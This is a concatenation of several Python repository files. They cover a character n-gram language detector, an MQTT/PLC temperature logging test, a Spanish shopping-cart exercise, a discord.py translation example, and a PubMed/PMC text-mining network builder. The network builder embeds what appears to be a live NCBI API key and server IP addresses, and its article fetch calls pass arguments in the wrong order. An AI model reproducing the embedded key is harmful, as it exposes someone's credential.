cleanup_data(data):\n \"\"\"[summary]\n\n Args:\n data ([string]): [input data]\n\n Returns:\n [string]: [clean up of punctuations, numbers]\n \"\"\"\n exclude = set(string.punctuation)\n data = ''.join(ch for ch in data if ch not in exclude)\n data = ''.join(ch for ch in data if not ch.isdigit())\n data = \" \" + data + \" \" * (MAX_NGRAM_LENGTH - 1)\n if not isinstance(data, str):\n return str(data, \"utf-8\", errors='strict')\n return data\n\n\ndef load_language_models():\n \"\"\"[summary]\n\n Returns:\n [dictionary]: [Contains language model that was already trained for each language]\n \"\"\"\n dic = {}\n \n for lang in LANGUAGES:\n #path = os.getcwd()+ LANGUAGE_MODELS + LANGUAGES[lang] + \".p\"\n name = \"{0}.p\".format(LANGUAGES[lang])\n path_dir = os.path.join(os.path.dirname(__file__), 'language-models')\n path = os.path.join(path_dir, name)\n lang_dic = pickle.load(\n open(path, \"rb\"))\n #open('{0}\\\\{1}.p'.format(LANGUAGE_MODELS, LANGUAGES[lang]), \"rb\"))\n dic[LANGUAGES[lang]] = lang_dic\n return dic\n\n\ndef get_difference(input_ngram_ranks, language_model):\n \"\"\"[summary]\n\n Args:\n input_ngram_ranks ([dictionary]): [contains ngram and its frequency of input]\n language_model ([dictionary]): [contains ngram and frequency of language train data]\n\n Returns:\n [int]: [score reflecting matching ngrams between input and language]\n \"\"\"\n difference = 0\n for ngram in input_ngram_ranks:\n if ngram in language_model:\n position_in_text = 
input_ngram_ranks[ngram]\n position_in_language = language_model[ngram]\n difference += abs(position_in_language - position_in_text)\n else:\n difference += PENALTY\n return difference\n\n\ndef compare_input_with_languages(language_models, input_ngram_ranks):\n \"\"\"[summary]\n\n Args:\n language_models ([dict]): [contains ngram and its frequency of train data]\n input_ngram_ranks ([dict]): [contains ngram and frequency of input]\n\n Returns:\n [list]: [contains list of tuples with language and its difference with given input]\n \"\"\"\n differences = []\n for language in language_models:\n difference = get_difference(\n input_ngram_ranks, language_models[language])\n differences.append((language, difference))\n return differences\n\n\ndef get_closest_language(differences):\n \"\"\"[summary]\n\n Args:\n differences ([list]): [contains tuples with language and difference score]\n\n Returns:\n [tuple]: [containing 3 closest possible languages to given input]\n \"\"\"\n # print(differences)\n differences_sorted = sorted(differences, key=lambda item: item[1])\n return differences_sorted[0][0], differences_sorted[1][0], differences_sorted[2][0]\n\n\ndef which_lang(input):\n \"\"\"[summary]\n\n Args:\n input ([string]): [description]\n\n Returns:\n [tuple]: [containing 3 closest possible languages to given input]\n \"\"\"\n language_models = load_language_models()\n input_ngrams = get_input_ngrams(input)\n input_ngram_ranks = get_ngram_ranks(input_ngrams)\n # print(len(input_ngram_ranks))\n # print(len(input))\n # print(input_ngram_ranks)\n # sys.exit()\n differences = compare_input_with_languages(\n language_models, input_ngram_ranks)\n return get_closest_language(differences)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', required=True, help=\"input file\")\n args = parser.parse_args()\n with open(args.f) as file:\n input = file.read()\n file.close()\n print((which_lang(input)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xtraspeed/whichlang","sub_path":"whichlang/whichlang.py","file_name":"whichlang.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27821819310","text":"# -*- coding: utf-8 -*-\nimport ads\nimport ast\nimport csv\nimport datetime\nimport mqtt\nimport os\nimport parsing_and_assignment\nimport time\n\npath = os.path.join(os.getcwd(), 'data_files', 'TemperaturePerformanceTest.csv')\nfile_exists = os.path.isfile(path)\n\nclass temp_performance_test():\n\n def __init__(self):\n self.ads_instance = ads.ads()\n self.mqtt_instance = mqtt.mqtt()\n self.ads_instance.connect(ams_netID=\"X.XX.XXX.XXX.X.X\", host=\"XXX.XXX.XXX.XXX\")\n self.var_list = parsing_and_assignment.getRawADSVarListFromSymbols(self.ads_instance)\n self.mqtt_instance.connect()\n self.mqtt_instance.client.subscribe(\"#\", qos=0)\n self.mqtt_instance.on_message = self.listen\n self.mqtt_instance.start_mqtt()\n\n def listen(self, client=None, userdata=None, msg=None):\n try:\n with open(path, 'a', newline='') as f:\n # fieldnames = ['name', \"value\", 'timestamp']\n # writer = csv.DictWriter(f, fieldnames=fieldnames)\n # if not file_exists:\n # writer.writeheader() # file doesn't exist yet, write a header\n # msg.payload = ast.literal_eval(msg.payload.decode(\"utf-8\"))\n # gw_temp={'name':'Temperature Gateway', \n # 'value': msg.payload['Temperature Gateway'],\n # 'timestamp':str(datetime.datetime.now().isoformat())}\n # print(gw_temp)\n # 
writer.writerow(gw_temp)\n                # plc_temp={'name':'Temperature PLC', \n                #           'value': float(self.ads_instance.read(var='GVL_default.el3202_ch1')/100),\n                #           'timestamp':str(datetime.datetime.now().isoformat())}\n                # print(plc_temp)\n                # writer.writerow(plc_temp)\n                fieldnames = ['Temperature Gateway', \"Temperature PLC\", 'timestamp']\n                writer = csv.DictWriter(f, fieldnames=fieldnames)\n                if not file_exists:\n                    writer.writeheader()  # file doesn't exist yet, write a header\n                msg.payload = ast.literal_eval(msg.payload.decode(\"utf-8\"))\n                row={'Temperature Gateway': msg.payload['Temperature Gateway'], \n                     'Temperature PLC': float(self.ads_instance.read(var='GVL_default.el3202_ch1')/100),\n                     'timestamp':str(datetime.datetime.now().isoformat())}\n                print(row)\n                writer.writerow(row)\n        except KeyboardInterrupt:\n            print('Abort')\n            self.mqtt_instance.stop_mqtt()\n            self.mqtt_instance.disconnect()\n            self.ads_instance.disconnect()\n\n    def block_main_thread(self):\n        while True:\n            try:\n                pass\n            except KeyboardInterrupt:\n                print('Abort')\n                self.mqtt_instance.stop_mqtt()\n                self.mqtt_instance.disconnect()\n                self.ads_instance.disconnect()\n\n#%%\nif __name__ == '__main__':\n    inst = temp_performance_test()","repo_name":"RWTH-EBC/OSIGBApp","sub_path":"PerformanceAnalysis/TemperatureGateway/TemperaturePerformanceTest.py","file_name":"TemperaturePerformanceTest.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29381766499","text":"p1 = [1, \"Pokemon X\", 33.77]\np2 = [2, \"Nintendo XL\", 203]\np3 = [3, \"Mario Kart 7\", 27.58]\np4 = [4, \"PlayStation 4\", 348.00]\np5 = [5, \"FIFA 16\", 51.19]\n\n# Dictionary to store cart\ncart = {}\n\n# Asking user choice for actions again and again\nwhile True:\n    while True: # For validation that user enters only 1, 2 or 3\n        print(''' Escribe VER para ver el producto\n          Escribe CART para mostrar el carrito\n          Escribe CHECKOUT para pagar''')\n        print()\n        choice = input('Ingresar decisión: ')\n        if choice in ('ver', 'cart', 'checkout'):\n            print()\n            break\n        else:\n            print('Favor ingresar la decisión correcta')\n            print()\n\n    if choice == 'ver': # If choice is 1 then add products to cart\n        print('''Ingrese el Número de producto y la cantidad de producto como número_producto.cantidad\n          1: Pokemon X Game para Nintendo 3DS\n          2: Nintendo 3DS XL\n          3: Mario Kart 7 Game para Nintendo 3DS\n          4: PlayStation 4\n          5: FIFA 16, PlayStation 4''')\n\n        while True: # Validation to check if user asks correct input like 5.2\n            product = input('Ingrese el número y la cantidad del producto como número_producto.cantidad (ejemplo 5,2):')\n            check_list = product.split('.')\n            if ((len(check_list) == 2) and (check_list[0] in ['1', '2', '3', '4', '5'])):\n\n                if check_list[0] not in cart: # If entered format is correct then add to cart\n                    cart[check_list[0]] = int(check_list[1])\n                else:\n                    cart[check_list[0]] += int(check_list[1])\n                print()\n                break\n            else:\n                print('Ingresar la decisión en el formato correcto')\n                print()\n\n\n    elif choice == 'cart': # If choice is 2, then print cart items\n        print('Items actuales en el carrito:')\n        for item in cart:\n            if item == '1':\n                precio = cart[item] * p1[2]\n                print('Cantidad:', cart[item], '-- Item:', p1[1], '-- Precio: $', round(precio, 1))\n            elif item == '2':\n                precio = cart[item] * p2[2]\n                print('Cantidad:', cart[item], '-- Item:', p2[1], '-- Precio: $', round(precio, 1))\n            elif item == '3':\n                precio = cart[item] * p3[2]\n                print('Cantidad:', cart[item], '-- Item:', p3[1], '-- Precio: 
$', round(precio, 1))\n elif item == '4':\n precio = cart[item] * p4[2]\n print('Cantidad:', cart[item], '-- Item:', p4[1], '-- Precio: $', round(precio, 1))\n elif item == '5':\n precio = cart[item] * p5[2]\n print('Cantidad:', cart[item], '-- Item:', p5[1], '-- Precio: $', round(precio, 1))\n print()\n\n\n elif choice == 'checkout': # If choice is 3, then print checkout price along with discount and total and end the program\n total = 0\n print('Precios a pagar')\n for item in cart:\n if item == '1':\n precio = cart[item] * p1[2]\n precio = precio - (0.2 * precio)\n print('Cantidad:', cart[item], '-- Item:', p1[1], '-- Precio: $', round(precio, 1))\n elif item == '2':\n precio = cart[item] * p2[2]\n precio = precio - (0.2 * precio)\n print('Cantidad:', cart[item], '-- Item:', p2[1], '-- Precio: $', round(precio, 1))\n elif item == '3':\n precio = cart[item] * p3[2]\n precio = precio - (0.2 * precio)\n print('Cantidad:', cart[item], '-- Item:', p3[1], '-- Precio: $', round(precio, 1))\n elif item == '4':\n precio = cart[item] * p4[2]\n precio = precio - (0.15 * precio)\n print('Cantidad:', cart[item], '-- Item:', p4[1], '-- Precio: $', round(precio, 1))\n elif item == '5':\n precio = cart[item] * p5[2]\n precio = precio - (0.15 * precio)\n print('Cantidad:', cart[item], '-- Item:', p5[1], '-- Precio: $', round(precio, 1))\n\n total += precio\n print('Precio total: $', round(total, 1))\n break","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej4/hito2_ej4_746f3954487ab1b6e5d473d51e75a7fc.py","file_name":"hito2_ej4_746f3954487ab1b6e5d473d51e75a7fc.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31319201338","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\n\nimport discord\nfrom discord import app_commands\n\nfrom dpy_toolbox import Bot, translating\n\nbot = Bot(command_prefix='!', intents=discord.Intents.all(), auto_sync=True)\nTOKEN = '' # BAD\n\n# language: command name: ...\nTRANSLATION_TABLE = {\n \"hey\": {\n \"default\": \"en\",\n \"en\": {\n \"name\": \"hello\",\n \"description\": \"say hello\"\n },\n \"de\": {\n \"name\": \"hallo\",\n \"description\": \"sage hallo\"\n },\n },\n \"add\": {\n \"en\": {\n \"name\": \"add\",\n \"params\": {\n \"number1\": {\n \"name\": \"first_number\",\n },\n }\n },\n \"de\": {\n \"name\": \"addieren\",\n \"description\": \"addiere zwei nummern\",\n \"params\": {\n \"number1\": {\n \"name\": \"erste_number\",\n },\n \"number2\": {\n \"name\": \"zweite_nummer\",\n \"description\": \"die zweite nummer\"\n }\n }\n }\n }\n}\n\n\n@bot.tree.command()\nasync def hey(inter: discord.Interaction) -> None:\n await inter.response.send_message(f\"Hello {inter.user.mention}!\")\n\n\n\"\"\"\nin this example no default lang is set therefore the \n if there is no translation for\n the command's name the function name (here \"add\") will be used\n the command's description the by discord.py provided default (\"...\") will be used\n a command's param the description defined using the describe decorator will be used\n\"\"\"\n\n\n@bot.tree.command()\n@app_commands.describe(number1=\"the first number\", number2=\"the second number\")\nasync def add(inter: discord.Interaction, number1: int, number2: int) -> None:\n await inter.response.send_message(f\"The solution is: `{number1 + number2}`!\")\n\n\n@bot.event\nasync def on_ready() -> None:\n print(f'Running as {bot.user}')\n\nif __name__ == '__main__':\n 
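# CommandTree.set_translator is a coroutine in discord.py, so it is run to\n    # completion with asyncio.run() here before bot.run() starts its own loop.\n    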
asyncio.run(bot.tree.set_translator(translating.DictonaryTranslator(TRANSLATION_TABLE)))\n bot.run(TOKEN)\n","repo_name":"TheWever/dpy-toolbox","sub_path":"examples/dict_translator.py","file_name":"dict_translator.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"74344626807","text":"import warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nimport treetaggerwrapper\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport re, regex, string, random, json, requests, sys, os, hashlib, time, datetime\nfrom collections import OrderedDict \nfrom operator import itemgetter\nimport mysql.connector\nfrom xml.etree import ElementTree\nimport fitz\nfrom scipy import spatial\nimport math \nimport nltk.data\nimport spacy\nfrom spacy.symbols import VERB\nfrom spacy.matcher import Matcher\nfrom lxml import etree\nfrom itertools import chain\n\n\nclass NetBuilder:\n\tstop_words = set(stopwords.words('english')) \n\tsent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\n\tnlp = spacy.load(\"en_core_web_sm\")\n\t#nlp.add_pipe(\"merge_entities\")\n\t#nlp.add_pipe(\"merge_noun_chunks\")\n\tnlp.add_pipe(nlp.create_pipe(\"merge_entities\"))\n\tnlp.add_pipe(nlp.create_pipe(\"merge_noun_chunks\"))\n\tnegation = None\n\tconjunction = None\n\tbioterms = None\n\tnet = None\n\tannotations = None\n\tclassifier = None;\n\twebserver_url = \"http://131.114.50.197/tagme_string\";\n\t#webserver_url = \"http://161.97.160.81/tagme_string\";\n\tarticles = {}\n\tpath = \"/var/www/html/netme/py/\";\n\ttagger = None\n\tcleaned_text = {}\n\tsearchid = None\n\tdebug = False\n\tpost_data = None\n\ttagger = None\n\tarticles_id = []\n\tapikey = \"9fa42ec62c582485fb7e6c69148eaf940308\"\n\t\n\tdef __init__(self):\t\n\t\tif(len(sys.argv) < 1):\n\t\t\tprint('')\n\t\t\texit()\n\t\tself.db_connect()\n\t\tself.tagger = treetaggerwrapper.TreeTagger(TAGLANG='en')\n\t\tself.searchid = sys.argv[1]\n\t\t## get searchid, data information are stored in request table\n\t\ttry:\n\t\t\tif sys.argv[2]: self.debug = True \n\t\texcept IndexError:\n\t\t\tself.debug = False\n\n\t\tself.bioterms = self.get_bioterms()\n\t\tself.conjunction = self.get_conjunctionterms()\n\t\tself.negation = self.get_negationterms()\n\t\tself.reset_log()\n\t\tself.write_log(\"Starting parsing operation\")\n\t\t\n\t\t#GET POST_DATA\n\t\tself.post_data = self.get_request()\n\t\t#self.post_data = json.loads(self.post_data['data'])\n\t\t\n\t\tprint(self.post_data)\n\t\t\n\t\tif self.post_data:\n\t\t\t#FREETEXT\n\t\t\tif self.post_data['freetext'] is not None and self.post_data['freetext']:\n\t\t\t\tself.articles = json.loads('{\"freetext\": \"'+self.json_string(self.post_data['freetext'])+'\"}')\n\t\t\t\tself.articles_id.append(\"freetext\")\n\t\t\t\n\t\t\t#PMC\n\t\t\tif self.post_data['pmc_terms'] is not None and len(self.post_data['pmc_terms']) > 0:\n\t\t\t\t#split query terms by ;\n\t\t\t\tquery = self.post_data['pmc_terms'].split(\";\")\n\t\t\t\tfor q in query:\n\t\t\t\t\tself.articles_fetch(self.terms_search(q, \"pmc\"), \"pmc\")\n\t\t\t\t\n\t\t\t#PMC IDLIST\n\t\t\tif self.post_data['pmc_id'] is not None and len(self.post_data['pmc_id'].split(\",\")) > 0:\n\t\t\t\tself.post_data['pmc_retmax'] = len(self.post_data['pmc_id'].split(\",\"))\n\t\t\t\tself.articles_fetch(self.post_data['pmc_id'].split(\",\"), \"pmc\")\n\t\t\t\n\t\t\t#PM\n\t\t\tif self.post_data['pubmed_terms'] is not None and 
len(self.post_data['pubmed_terms']) > 0:\n\t\t\t\t#split query terms by ;\n\t\t\t\tquery = self.post_data['pubmed_terms'].split(\";\")\n\t\t\t\tfor q in query:\n\t\t\t\t\tself.articles_fetch(self.terms_search(q, \"pubmed\"), \"pubmed\")\n\t\t\t\t\n\t\t\t#PM IDLIST\n\t\t\tif self.post_data['pubmed_id'] is not None and len(self.post_data['pubmed_id'].split(\",\")) > 0:\n\t\t\t\tself.post_data['pubmed_retmax'] = len(self.post_data['pubmed_id'].split(\",\"))\n\t\t\t\tself.articles_fetch(self.post_data['pubmed_id'].split(\",\"), \"pubmed\")\n\t\t\t\n\t\t\t#PDF\n\t\t\tpdf_path = self.path+\"pdf/\"\n\t\t\tfor filename in os.listdir(pdf_path):\n\t\t\t\tif filename.startswith(self.searchid):\n\t\t\t\t\tself.articles[\"pdf|\"+filename.replace(self.searchid+'_', '')] = self.parse_pdf(pdf_path+filename)\n\t\t\t\t\tself.articles_id.append(\"pdf|\"+filename.replace(self.searchid+'_', ''))\n\t\t\t\n\t\t\t# self.articles array contains articles fulltext, self.articles_id contains id list (format {ORIGIN_TYPE}|{id} example pdf|5.pdf, pmc|142341234, etc)\n\t\t\t\n\t\t\tif (self.articles) :\n\t\t\t\tself.net = {'edges': [], 'nodes': []}\n\t\t\t\tself.annotations = {'article': {}, 'spot_list':{}, 'word_list':{}}\n\t\t\t\tself.make_net()\n\t\t\telse:\n\t\t\t\tprint('')\n\t\telse:\n\t\t\tprint('')\n\n\t\t\n\t################# PMC SEARCH #################\n\t\n\tdef terms_search(self, terms, dbtype = \"pmc\"):\n\t\ttry:\n\t\t\tidlist = []\n\t\t\tterms = terms+\"+AND+free+fulltext[filter]\" if (dbtype == \"pmc\") else terms\n\t\t\tretmax = int(self.post_data[dbtype+'_retmax'])\n\t\t\tsort = self.post_data[dbtype+'_sort']\n\t\t\turl_search = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?apikey=\"+self.apikey+\"&db=\"+dbtype+\"&term=\"+terms+\"&retmax=\"+str(retmax*4)+\"&sort=\"+sort\n\t\t\tr = requests.get(url = url_search, params = '') \n\t\t\tr = ElementTree.fromstring(r.content)\n\t\t\tfor id_list_tag in r.findall('IdList'):\n\t\t\t\tfor id_article_tag in id_list_tag.findall('Id'):\n\t\t\t\t\tidlist.append(id_article_tag.text)\n\t\t\treturn idlist\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tself.write_log(\"Error in terms_search: \"+str(e))\n\t\t\treturn ''\n\t\t\t\n\tdef articles_fetch_old(self, idlist, dbtype = \"pmc\"):\n\t\ttry:\n\t\t\tcount = 0\n\t\t\turl_fetch = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi\"\n\t\t\tkey = dbtype+'_obj'\n\t\t\tretmax = int(self.post_data[dbtype+'_retmax'])\n\t\t\tn_cycle = (len(idlist) // 100) + 1\n\t\t\tfor n in range(n_cycle):\n\t\t\t\t_idlist = ','.join(idlist[(n*100):((n+1)*100)])\n\t\t\t\tpar = {\n\t\t\t\t\t'db': dbtype,\n\t\t\t\t\t'id': _idlist,\n\t\t\t\t\t'retmode' : 'xml',\n\t\t\t\t\t'apikey' : self.apikey,\n\t\t\t\t}\n\t\t\t\tr = requests.post(url = url_fetch, params = par) \n\t\t\t\tr = ElementTree.fromstring(r.content)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif(dbtype == \"pmc\"):\n\t\t\t\t\tfor article_tag in r.findall('article'):\n\t\t\t\t\t\tfor body_tag in article_tag.findall('body'):\n\t\t\t\t\t\t\tcontent = ''\t\t\t\t\t\t\n\t\t\t\t\t\t\tfor p_tag in body_tag.iter('p'):\n\t\t\t\t\t\t\t\tif p_tag.text:\n\t\t\t\t\t\t\t\t\tcontent+= p_tag.text\n\t\t\t\t\t\t\tarticle_id = article_tag.find(\".//article-id[@pub-id-type='pmc']\")\n\t\t\t\t\t\t\tif article_id.text and len(content) > 100 and \"pmc|\"+article_id.text not in self.articles_id:\n\t\t\t\t\t\t\t\tself.articles[\"pmc|\"+article_id.text] = content.replace('\\n', '')\n\t\t\t\t\t\t\t\tself.articles_id.append(\"pmc|\"+article_id.text)\n\t\t\t\t\t\t\t\tcount+=1\n\t\t\t\t\t\t\t\tif count 
>= retmax:\n\t\t\t\t\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tfor article_tag in r.findall('PubmedArticle'):\n\t\t\t\t\t\tcontent = ''\n\t\t\t\t\t\tfor abstract_tag in article_tag.findall('.//AbstractText'):\n\t\t\t\t\t\t\tif abstract_tag.text:\n\t\t\t\t\t\t\t\tcontent+= abstract_tag.text\n\t\t\t\t\t\tarticle_id = article_tag.find(\".//PMID\")\n\t\t\t\t\t\tif article_id.text and len(content) > 100 and \"pubmed|\"+article_id.text not in self.articles_id:\n\t\t\t\t\t\t\tself.articles[\"pubmed|\"+article_id.text] = content.replace('\\n', '')\n\t\t\t\t\t\t\tself.articles_id.append(\"pubmed|\"+article_id.text)\n\t\t\t\t\t\t\tcount+=1\n\t\t\t\t\t\t\tif count >= retmax: \n\t\t\t\t\t\t\t\treturn\n\t\t\treturn\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tself.write_log(\"Error in articles_fetch: \"+str(e))\n\t\t\treturn\n\t\n\tdef stringify_children(self, node):\n\t\t\"\"\"\n\t\tFilters and removes possible Nones in texts and tails\n\t\t\"\"\"\n\t\tif node is not None:\n\t\t\tparts = (\n\t\t\t\t[node.text]\n\t\t\t\t+ list(chain(*([c.text, c.tail] for c in node.getchildren())))\n\t\t\t\t+ [node.tail]\n\t\t\t)\n\t\t\treturn \"\".join(filter(None, parts))\n\t\treturn \"\"\n\t\n\tdef pubmed_parser(self, response):\n\t\tfor article_tag in response.findall('PubmedArticle'):\n\t\t\tarticle_id = article_tag.find(\".//PMID\")\n\t\t\tif not article_id.text: continue\n\t\t\tcontent = ''\n\t\t\tfor abstract_tag in article_tag.findall('.//AbstractText'):\n\t\t\t\tif abstract_tag.text:\n\t\t\t\t\tcontent += abstract_tag.text\n\t\t\tif not (len(content) > 100 and article_id.text not in self.articles) : continue\n\t\t\tself.articles[article_id.text] = content.replace('\\n', '')\n\t\t\tself.articles_id.append(\"pubmed|\"+article_id.text)\n\n\tdef pubmed_central_parser(self, response):\n\t\tfor article_tag in response.findall('article'):\n\t\t\tarticle_meta = article_tag.find(\".//article-meta\")\n\t\t\tarticle_id = article_meta.find('article-id[@pub-id-type=\"pmc\"]')\n\t\t\tif not article_id.text: continue\n\t\t\tcontent = self.parse_pubmed_paragraph(article_tag)\n\t\t\tif not (len(content) > 100 and article_id.text not in self.articles): continue\n\t\t\tself.articles[article_id.text] = content.replace('\\n', '')\n\t\t\tself.articles_id.append(\"pmc|\"+article_id.text)\n\t\n\tdef parse_pubmed_paragraph(self, article_tag):\n\t\tdict_pars = list()\n\t\tfor paragraph in article_tag.findall(\".//body//p\"):\n\t\t\tparagraph_text = self.stringify_children(paragraph)\n\t\t\tif paragraph_text != '':\n\t\t\t\tdict_pars.append(paragraph_text)\n\n\t\ttxt = \"\".join(dict_pars)\n\t\ttxt = re.sub('\\\\s+', ' ', txt)\n\t\treturn txt\n\t\n\tdef sub_list(self, idlist, n, retmax, sup, len_id_list):\n\t\treturn idlist[n * retmax: sup] if sup < len_id_list else idlist[n * retmax:]\n\n\tdef articles_fetch(self, idlist, apikey, retmax=20, dbtype=\"pmc\"):\n\t\t#self.articles = dict()\n\t\ttry:\n\t\t\turl_fetch = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi\"\n\t\t\tlen_id_list = len(idlist)\n\t\t\tfor n in range((len_id_list // retmax) + 1):\n\t\t\t\tsup = (n + 1) * retmax\n\t\t\t\tpar = {\n\t\t\t\t\t'db' : dbtype,\n\t\t\t\t\t'id' : ','.join(self.sub_list(idlist, n, retmax, sup, len_id_list)),\n\t\t\t\t\t'retmode': 'xml',\n\t\t\t\t\t'apikey' : apikey,\n\t\t\t\t}\n\t\t\t\tr = requests.post(url=url_fetch, params=par)\n\t\t\t\tif dbtype == \"pmc\":\n\t\t\t\t\tr = etree.fromstring(r.content, parser=etree.XMLParser(huge_tree=True))\n\t\t\t\telse:\n\t\t\t\t\tr = 
ElementTree.fromstring(r.content)\n\t\t\t\tself.pubmed_central_parser(r) if dbtype == \"pmc\" else self.pubmed_parser(r)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tself.write_log(\"Error in articles_fetch: \"+str(e))\n\t\t\treturn None\n\t\n\t\n\t\t\t\n\t################# PDF PARSER #################\n\t\n\tdef parse_pdf(self, file):\n\t\ttry:\n\t\t\tarticle = '';\n\t\t\tdoc = fitz.open(file)\n\t\t\tpage_count = doc.pageCount\n\t\t\tmetadata = doc.metadata\n\t\t\t\n\t\t\t# page creation\n\t\t\tpages_blocks = dict()\n\t\t\tduplicate_blk = dict()\n\t\t\tfor page in range(0, page_count):\n\t\t\t\tpage_i = doc.loadPage(page)\n\t\t\t\tfor block in page_i.getText(\"blocks\"):\n\t\t\t\t\tblock_coords = block[0:4]\n\t\t\t\t\tif block_coords not in pages_blocks:\n\t\t\t\t\t\tpages_blocks[block_coords] = dict()\n\t\t\t\t\t\tpages_blocks[block_coords][page] = block[4:6]\n\t\t\t\t\telse:\n\t\t\t\t\t\tif block_coords not in duplicate_blk:\n\t\t\t\t\t\t\tduplicate_blk[block_coords] = {\"count\": 0, \"testo\": block[4:6]}\n\t\t\t\t\t\tduplicate_blk[block_coords][\"count\"] += 1\n\n\t\t\tfor key in duplicate_blk:\n\t\t\t\tif duplicate_blk[key][\"count\"] > 2:\n\t\t\t\t\tpages_blocks.pop(key)\n\n\t\t\tfor block in pages_blocks:\n\t\t\t\tfor text in pages_blocks[block]:\n\t\t\t\t\t#article+= pages_blocks[block][text][0].replace('\\n', ' ')\n\t\t\t\t\tarticle+= pages_blocks[block][text][0].replace('\\n', ' ').strip().replace(' ', ' ')+'. '\n\t\t\t#os.remove(file)\n\t\t\treturn article\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in parse_pdf: \"+str(e))\n\t\t\treturn article\n\t\t\t\n\tdef json_string(self, string):\n\t\tstring = string.replace('\\r\\n', ' ')\n\t\tstring = string.replace('\\r', '')\n\t\tstring = string.replace('\\n', '')\n\t\t#string = string.replace(\"'\", \"\\'\")\n\t\tstring = string.replace('\\\"', '')\n\t\treturn string\t\t\n\t\n\t######### NETWORK ################\n\t\n\tdef make_net(self):\n\t\tsentences_list = {}\n\t\tfor index, id_article in enumerate(self.articles):\n\t\t\tself.write_log(\"ANNOTATING \"+str(index+1)+\" of \"+str(len(self.articles))+\" articles\")\n\t\t\t#Tokenize article by period and re-join (Remove extra space between period)\n\t\t\tsentences_list[id_article] = self.sent_detector.tokenize(self.articles[id_article])\n\t\t\tself.articles[id_article] = ''.join(sentences_list[id_article])\n\t\t\tself.request_data(id_article, self.articles[id_article])\n\t\tfor index_article, id_article in enumerate(self.annotations[\"article\"]):\n\t\t\tsentence_start = 0\n\t\t\ttotal_words = len(re.findall(r'\\w+', self.articles[id_article]))\n\t\t\tfor sentence in sentences_list[id_article]:\n\t\t\t\tsentence_end = sentence_start + len(sentence) -1\n\t\t\t\tspot_list = []\n\t\t\t\tfor index_annotation, annotation in enumerate(self.annotations[\"article\"][id_article]):\n\t\t\t\t\tif annotation >= sentence_start and annotation < sentence_end:\n\t\t\t\t\t\tspot_list.append(self.annotations[\"article\"][id_article][annotation])\n\t\t\t\tself.find_edges(id_article, sentence, spot_list, total_words)\n\t\t\t\tsentence_start = sentence_end\n\t\tfor e in range(len(self.net['edges'])):\n\t\t\tbio = self.check_bio_edge(self.net['edges'][e]['data']['label'].replace(\"not \", \"\"))\n\t\t\tself.net['edges'][e]['data']['bio'] = bio\n\t\t\tself.net['edges'][e]['data']['aid'] = list(self.net['edges'][e]['data']['aid'])\n\t\t\t#calc weight\n\t\t\ttf_medium = 0\n\t\t\tfor index, id_article in enumerate(self.net['edges'][e]['data']['tf']):\n\t\t\t\ttf_medium+= 
self.net['edges'][e]['data']['tf'][id_article]['tf']/self.net['edges'][e]['data']['tf'][id_article]['total_words']\n\t\t\ttf = tf_medium/len(self.net['edges'][e]['data']['tf'])\n\t\t\tidf = math.log(len(self.articles)/len(self.net['edges'][e]['data']['tf']))\n\t\t\tself.net['edges'][e]['data']['weight'] = tf*idf if idf > 0 else tf\n\t\tself.net['nodes'] = sorted(self.net['nodes'], key=lambda x: x['data']['size'], reverse=True)\n\t\tself.reset_log()\n\t\tdump = {'annotations': self.annotations, 'nodes': self.net['nodes'], 'edges': self.net['edges'], 'articles': self.articles_id}\n\t\tdump = json.dumps(dump, default=self.set_default)\n\t\tprint(dump)\n\t\tself.save_dump(dump)\n\t\t\n\tdef set_default(self, obj):\n\t\tif isinstance(obj, set):\n\t\t\treturn list(obj)\n\t\traise TypeError\n\t\n\t################# ANNOTATION ########################\n\t\n\tdef response_replace(self, rp):\n\t\treturn rp.replace('\\n', \" \") \\\n                .replace(\"\\\\'\", \"'\") \\\n                .replace('\\\"', '\"') \\\n                .replace('\\\\', \"\")\n\t\n\tdef request_data(self, id_article, article):\n\t\ttry:\n\t\t\tdata = None\n\t\t\tannotations = self.get_annotations(id_article)\n\t\t\tif annotations:\n\t\t\t\ttry:\n\t\t\t\t\tdata = json.loads(annotations['data'])\n\t\t\t\t\tif data:\n\t\t\t\t\t\tself.save_annotations(id_article, data)\n\t\t\t\t\t\treturn\n\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tdata = None\n\t\t\tpar = {'name': article}\n\t\t\tr = requests.post(url = self.webserver_url, data = par, timeout=1800)\n\t\t\t#data = json.loads(response_replace(r.content.decode('utf-8')))\n\t\t\tdata = r.json() \n\t\t\tif data['response']:\n\t\t\t\tself.save_annotations_db(id_article, json.dumps(data['response']))\n\t\t\t\tself.save_annotations(id_article, data['response'])\n\t\t\treturn\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in request_data: \"+str(e))\n\n\tdef save_annotations(self, id_article, data):\n\t\tself.annotations['article'][id_article] = {}\n\t\tfor key, annotation in enumerate(data):\n\t\t\t#store in annotation word_list and spot_list\n\t\t\ttry:\n\t\t\t\tif(len(annotation[\"categories\"]) == 0):\n\t\t\t\t\tannotation[\"categories\"] = 